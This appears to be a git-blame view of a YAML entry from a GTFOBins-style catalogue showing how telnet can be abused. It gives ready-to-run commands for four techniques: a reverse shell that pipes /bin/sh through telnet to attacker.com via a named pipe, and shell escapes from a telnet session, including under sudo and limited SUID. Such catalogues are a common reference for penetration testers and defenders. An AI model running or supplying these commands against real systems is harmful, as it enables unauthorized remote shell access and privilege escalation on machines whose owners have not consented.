2018-05-21 19:14:41 +00:00
|
|
|
---
|
|
|
|
|
functions:
|
2018-10-05 17:55:38 +00:00
|
|
|
shell:
|
2018-07-16 13:01:50 +00:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-10-05 17:55:38 +00:00
|
|
|
reverse-shell:
|
2018-07-16 13:01:50 +00:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
2018-07-31 10:39:58 +00:00
|
|
|
TF=$(mktemp -u)
|
2018-07-16 13:01:50 +00:00
|
|
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
2018-10-05 17:55:38 +00:00
|
|
|
sudo:
|
2018-07-16 13:01:50 +00:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
sudo telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-10-05 17:55:38 +00:00
|
|
|
limited-suid:
|
2018-07-16 13:01:50 +00:00
|
|
|
- description: BSD version only. Needs to be connected first.
|
|
|
|
|
code: |
|
|
|
|
|
RHOST=attacker.com
|
|
|
|
|
RPORT=12345
|
|
|
|
|
./telnet $RHOST $RPORT
|
|
|
|
|
^]
|
|
|
|
|
!/bin/sh
|
2018-05-21 19:14:41 +00:00
|
|
|
---
|
